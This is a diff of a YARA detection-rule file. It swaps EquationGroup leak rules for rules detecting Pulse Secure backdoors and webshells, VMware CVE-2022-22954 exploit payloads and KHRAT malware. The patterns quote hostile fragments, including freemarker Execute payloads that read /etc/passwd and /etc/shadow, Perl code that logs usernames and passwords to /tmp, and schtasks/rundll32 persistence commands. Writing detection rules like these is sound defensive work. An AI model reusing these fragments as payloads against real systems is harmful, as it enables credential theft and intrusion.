+		id = "690cc347-e60f-5cac-b65d-367ecee69251"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2088-L2112"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L137-L153"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa46cb188ba820199c013633ade72ab1c8bea316384042e9e3b5098c439841a5"
+		hash = "91ee23ee24e100ba4a943bb4c15adb4c"
+		logic_hash = "c9aa2b9ef8aff14c20ed6597b1a71eafc3e3c181aabf9a3a68df18945207ff86"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
+		quality = 60
+		tags = ""
 
 	strings:
-		$op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00
-               00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00
-               65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00
-               00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68
-               5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00
-               63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00
-               6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00
-               57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00
-               44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00
-               6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00
-               00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00
-               53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
+		$s1 = "open("
+		$s2 = ">>/tmp/"
+		$s3 = "syswrite("
+		$s4 = /\}[\x09\x20]{0,32}elsif[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27](Radius|Samba|AD)[\x22\x27][\x09\x20]{0,32}\)\s{0,128}\{\s{0,128}@\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}&/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Banner_Implant9X : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_QUIETPULSE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7cbb509e-2a91-5e3c-8d19-61fda797cd8c"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "4c49eef7-b8fa-55d5-8fb8-8964f6f50003"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2114-L2129"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L154-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bda7b8ab097c0a5ca90b05147d4227e5a03735b99633b5081d80d2d72bceba9"
+		hash = "00575bec8d74e221ff6248228c509a16"
+		logic_hash = "226a56369e141834d4834400bbf1a006bbb6e9b39e16e24b0106bff1a9c202a9"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
+		quality = 83
+		tags = ""
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$op1 = { c9 c3 57 8d 85 2c eb ff ff }
+		$s1 = /open[\x09\x20]{0,32}\(\*STDOUT[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
+		$s2 = /open[\x09\x20]{0,32}\(\*STDERR[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>&CLIENT[\x22\x27]\)/
+		$s3 = /socket[\x09\x20]{0,32}\(SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}PF_UNIX[\x09\x20]{0,32},[\x09\x20]{0,32}SOCK_STREAM[\x09\x20]{0,32},[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{0,128}unlink/
+		$s4 = /bind[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}sockaddr_un\(/
+		$s5 = /listen[\x09\x20]{0,32}\([\x09\x20]{0,32}SERVER[\x09\x20]{0,32},[\x09\x20]{0,32}SOMAXCONN[\x09\x20]{0,32}\)[\x09\x20]{0,32};/
+		$s6 = /my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}fork\([\x09\x20]{0,32}\)[\x09\x20]{0,32};\s{1,128}if[\x09\x20]{0,32}\([\x09\x20]{0,32}\$\w{1,64}[\x09\x20]{0,32}==[\x09\x20]{0,32}0[\x09\x20]{0,32}\)[\x09\x20]{0,32}\{\s{1,128}exec\(/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Greatdoc_Dll_Config : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "592e4e40-f5cd-5a11-8a1b-0cdcf6f267ec"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "1fab6d2f-96e8-5def-a93e-2bddd04e7ec8"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2131-L2147"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L173-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "edb14cc9e51bbf6b3ca2c52f841edfa3df1ca89b3e7c1b5a59baf3a13be0fc46"
+		hash = "d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b"
+		logic_hash = "d65a466cc15214d8e26597588c039a6b9fb4637ef8f3b1ebea27f016fbd5cba8"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
+		quality = 83
+		tags = ""
 
 	strings:
-		$x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
-		$x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
-		$x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
-		$x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
+		$s1 = "->getRealmInfo()->{name}"
+		$s2 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>/
+		$s3 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]realm=\$/
+		$s4 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]username=\$/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27]password=\$/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		(@s1 [ 1 ] < @s2 [ 1 ] ) and ( @s2 [ 1 ] < @s3 [ 1 ] ) and $s4 and $s5
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Scanner : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_2
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "603c82d0-2e65-5353-a109-5f69697cffa4"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "dc941935-aec7-54b6-a278-f1453b9785df"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2149-L2166"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L191-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7f2ee4ac260b78764573187c501ed27fbfdf573e618f15dbd307177afa670605"
+		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
+		logic_hash = "4ade993176c918ec23e99fc585e9ab14d9f9e93a7eca00f2c3b0ebbd13d6ec5b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
+		tags = ""
 
 	strings:
-		$x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
-		$x2 = "Usage: %s typeofscan IP_address" fullword ascii
-		$x3 = "# scanning ip  %d.%d.%d.%d" fullword ascii
-		$x4 = "Welcome to the network scanning tool" fullword ascii
-		$x5 = "***** %s ***** (length %d)" fullword ascii
+		$s1 = "open(*fd,"
+		$s2 = "syswrite(*fd,"
+		$s3 = "close(*fd);"
+		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/[\w.]{1,128}[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$\w{1,128} ?[\x22\x27],[\x09\x20]{0,32}5000\)/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mcl_Ntmemory_Std : FILE
+rule SIGNATURE_BASE_FE_APT_Trojan_PL_RADIALPULSE_3
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "608218a8-7642-5ec4-8c07-87248649f022"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "8a597521-c873-5bcc-85e6-5a0a061fffb7"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2168-L2183"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L209-L226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d3c76cf0ca0f798e1ca3c0a1b88c3bb425f1c36439842c4c33247dfcb44a877"
+		hash = "4a2a7cbc1c8855199a27a7a7b51d0117"
+		logic_hash = "025308591e058de284f949fd4f788e4a4f46bb2f6c0e1161237f1f811d8179ba"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
+		tags = ""
 
 	strings:
-		$op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 }
-		$op2 = { 44 24 33 6f c6 44 24 34 77 c6 }
-		$op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e }
+		$s1 = "open(*fd,"
+		$s2 = "syswrite(*fd,"
+		$s3 = "close(*fd);"
+		$s4 = /open\(\*fd,[\x09\x20]{0,32}[\x22\x27]>>\/tmp\/dsstartssh\.statementcounters[\x22\x27]\);[\x09\x20]{0,32}syswrite\(\*fd,[\x09\x20]{0,32}/
+		$s5 = /syswrite\(\*fd,[\x09\x20]{0,32}[\x22\x27][\w]{1,128}=\$username ?[\x22\x27],[\x09\x20]{0,32}\d{4}\)/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Tacothief : FILE
+rule SIGNATURE_BASE_FE_APT_Backdoor_Linux32_SLOWPULSE_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7be7ca05-c2c7-5a7d-8b1b-e6741b4397b9"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "dd35257f-5b6f-55a6-a709-873ded1f4b72"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2185-L2198"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L227-L244"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "565d94ac0dd65de0926d11ae08ee78f14dcb211ca97c77c39f394fb36890fc6f"
+		hash = "cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68"
+		logic_hash = "c1d92ea4ed8e5934c8356e1e52092935c53a138e454026737448f7f523ea06be"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
 
 	strings:
-		$x1 = "File too large!  Must be less than 655360 bytes." fullword ascii
+		$sb1 = {FC b9 [4] e8 00 00 00 00 5? 8d b? [4] 8b}
+		$sb2 = {f3 a6 0f 85 [4] b8 03 00 00 00 5? 5? 5?}
+		$sb3 = {9c 60 e8 00 00 00 00 5? 8d [5] 85 ?? 0f 8?}
+		$sb4 = {89 13 8b 51 04 89 53 04 8b 51 08 89 53 08}
+		$sb5 = {8d [5] b9 [4] f3 a6 0f 8?}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntevt : FILE
+rule SIGNATURE_BASE_FE_APT_Webshell_PL_STEADYPULSE_1
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd25f703-ff3e-5e75-b1eb-24a658a1ac8e"
-		date = "2017-04-15"
+		description = "Detects samples mentioned in PulseSecure report"
+		author = "Mandiant"
+		id = "49457fbb-9288-565f-909d-e8228c21c1e4"
+		date = "2021-04-16"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2200-L2219"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_pulsesecure.yar#L265-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "29572cce9af51adf12db019f885f868fd77ff9034a6944a6286a4d2a0988842a"
+		hash = "168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc"
+		logic_hash = "a0e3ebdd02ccf5cc8fc0a83c1d0224aed45dc5094eb85bd855e5b74b34e3aaaf"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
+		tags = ""
 
 	strings:
-		$x1 = "c:\\ntevt.pdb" fullword ascii
-		$s1 = "ARASPVU" fullword ascii
-		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
-		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
-		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
+		$s1 = "parse_parameters"
+		$s2 = "s/\\+/ /g"
+		$s3 = "s/%(..)/pack("
+		$s4 = "MIME::Base64::encode($"
+		$s5 = "$|=1;"
+		$s6 = "RC4("
+		$s7 = "$FORM{'cmd'}"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Processes_Target : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_1 : CVE_2022_22954
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b910f46-5d19-5ecd-9647-10ee9ee7b012"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2221-L2236"
+		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
+		author = "Florian Roth"
+		id = "c1923d78-c339-584a-a47c-edff8f72fd0d"
+		date = "2022-04-08"
+		modified = "2025-03-29"
+		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
+		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9e26224b7eafc999c9638d4591a45297e3293b0e90e63c2d207ee52848c4ce2"
-		score = 75
+		logic_hash = "20c1d55e29b777cca3cb8e92fbe45e23e6bbf972167dee8b0a012d9ff12f3841"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
+		tags = "CVE-2022-22954"
 
 	strings:
-		$s1 = "Select * from Win32_Process" fullword ascii
-		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
-		$s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
+		$x2 = "${\"freemarker.template.utility.Execute\"?new()("
+		$x3 = "cat /etc/passwd\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
+		$x4 = "cat /etc/passwd\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
+		$x5 = "cat /etc/shadow\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute"
+		$x6 = "cat /etc/shadow\\\")).(#execute=#instancemanager.newInstance(\\\"freemarker.template.utility.Execute"
+		$fpg1 = "All Rights"
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg4 = "Copyright" ascii wide
+		$fpg5 = "License"
+		$fpg6 = "<?xml"
+		$fpg7 = "Help" fullword
+		$fpg8 = "COPYRIGHT" ascii wide fullword
+		$fpg9 = "Backup"
+		$fp1 = "severity: critical"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_St_Lp : FILE
+rule SIGNATURE_BASE_LOG_SUSP_EXPL_POC_Vmware_Workspace_ONE_CVE_2022_22954_Apr22_ : CVE_2022_22954
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2d4ee801-c7f4-5476-8368-89aa2863ba96"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2238-L2254"
+		description = "Detects payload as seen in PoC code to exploit Workspace ONE Access freemarker server-side template injection CVE-2022-22954"
+		author = "Florian Roth"
+		id = "c54a3a7a-aafc-52d4-863c-ed254b0da527"
+		date = "2022-04-08"
+		modified = "2025-03-29"
+		old_rule_name = "EXPL_POC_VMWare_Workspace_ONE_CVE_2022_22954_Apr22"
+		reference = "https://twitter.com/rwincey/status/1512241638994853891/photo/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2022_22954_vmware_workspace_one.yar#L36-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38a48a931856e0eb8e16b7902f5e494b50f8895d4221b5359fc3339d1b52eb8e"
-		score = 75
+		logic_hash = "3c383f197da1e043e632c4d4de03fa7ff42e3fb6fa7824f326874446bcd13588"
+		score = 60
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
+		tags = "CVE-2022-22954"
 
 	strings:
-		$x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
-		$x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
-		$x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
-		$x4 = "E: Execute a Command on the Implant" fullword ascii
+		$x1 = "66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28" ascii
+		$fp2 = "ModSecurity"
+		$fp3 = " 302 -"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Epwrapper : FILE
+
+rule SIGNATURE_BASE_KHRAT_Malware : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects an Imphash of KHRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81b72f7f-ba5a-5f45-b77c-071cfb4571d3"
-		date = "2017-04-15"
+		id = "3e6a5aca-9898-5864-8974-ca4adf272893"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2256-L2271"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L13-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a1a54cd3fef3db9a20f3be25336fcbabe0d993403f001a04a02b5dbfd629543"
+		logic_hash = "cfc1a9fb4dbec4deb70616ab7c4cce3cf56429f61fd36f78245621527d011e20"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
-
-	strings:
-		$x1 = "* Failed to get remote TCP socket address" fullword wide
-		$x2 = "* Failed to get 'LPStart' export" fullword wide
-		$s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
+		hash1 = "53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "6a8478ad861f98f8428a042f74de1944"
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_2000 : FILE
+rule SIGNATURE_BASE_MAL_KHRAT_Script
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Rule derived from KHRAT script but can match on other malicious scripts as well"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
+		id = "fd345647-4887-560e-a6b2-129a880026aa"
+		date = "2017-08-31"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2273-L2290"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_khrat.yar#L26-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dfcd7d928c921dbe7162712ca74a105a938fd9ac675faaaa228d05139b2077de"
+		logic_hash = "c27a89028794b50b95850d90ee29b56606e6b58b862a26e287077e7f7be7f096"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
+		hash1 = "8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3"
 
 	strings:
-		$s1 = "0M1U1Z1p1" fullword ascii
-		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
-		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
-		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
+		$x1 = "CreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn" ascii
+		$x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii
+		$x3 = "<registration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" >" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dllload_Target : FILE
+rule SIGNATURE_BASE_MAL_KHRAT_Scritplet : FILE
 {
 	meta:
